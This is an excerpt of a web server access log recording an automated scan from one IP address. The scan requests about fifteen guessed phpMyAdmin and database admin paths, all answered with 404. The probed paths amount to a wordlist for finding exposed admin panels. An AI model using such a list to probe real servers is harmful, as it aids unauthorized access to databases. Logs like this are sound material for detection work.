89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /db/webadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /sql/websql/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /sql/myadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /administrator/web/index.php?lang=en HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /administrator/db/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:27 +0200] "GET /phpMyAdmin-4.9.10-all-languages/index.php?lang=en HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:28 +0200] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:28 +0200] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:28 +0200] "GET /phpmyadmin2015/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
89.157.244.173 - - [04/Oct/2023:09:50:28 +0200] "GET /phpmyadmin1/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
